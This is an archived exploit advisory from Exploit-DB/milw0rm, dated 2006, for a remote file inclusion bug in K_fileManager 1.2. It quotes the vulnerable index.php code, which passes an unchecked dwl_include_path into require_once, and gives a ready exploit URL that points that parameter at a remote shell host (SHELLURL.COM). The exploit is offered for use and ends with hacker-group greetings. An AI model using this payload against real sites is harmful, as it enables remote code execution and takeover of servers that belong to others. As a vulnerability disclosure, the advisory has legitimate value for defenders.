k_fileManager 1.2 - 'dwl_include_path' Remote File Inclusion

EDB-ID:

2104


Author:

SHiKaA

Type:

webapps


Platform:

PHP

Date:

2006-08-01


#=================================================================
#K_fileManager v1.2 <= (dwl_include_path) Remote File Inclusion Exploit
#================================================================
#                                                                |
#Critical Level : Dangerous                                      |
#                                                                |
#Venedor site : http://knusperleicht.at/                         |
#                                                                |
#Version : 1.2                                                   |
#                                                                |
#=================================================================
#Bug in : index.php
#
#Vlu Code :
#--------------------------------
#/**********************************************************
#//  INCLUDE PATH
#@define("DWL_INCLUDE_PATH",$dwl_include_path);
#//  INCLUDE PATH
#//**********************************************************
#
#//Dateien importieren
#       require_once(DWL_INCLUDE_PATH."inc/config.inc.php");
#       require_once(DWL_INCLUDE_PATH."lang/".FM_LANGUAGE."/lang.inc.php");
#       require_once(DWL_INCLUDE_PATH."inc/Dwl_template.php");
#       require_once(DWL_INCLUDE_PATH."inc/Dwl_db.php");
#       require_once(DWL_INCLUDE_PATH."inc/Dwl_directory.php");
#       require_once(DWL_INCLUDE_PATH."inc/Dwl_stuff.php");
#       require_once(DWL_INCLUDE_PATH."inc/Dwl_statistic.php");
#
#
#=================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/index.php?dwl_include_path=http://SHELLURL.COM?
#
#===============================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : Bl@Ck^B1rd Semsemmasr Black_Scorpion Medo_Ye7ya Kambaa  NANA Kashtawa
#Skiing Gendiaaa Saw AzIZa SnIpEr_Sa Masry OSA FEGLA 3amer
=================================================================

# milw0rm.com [2006-08-01]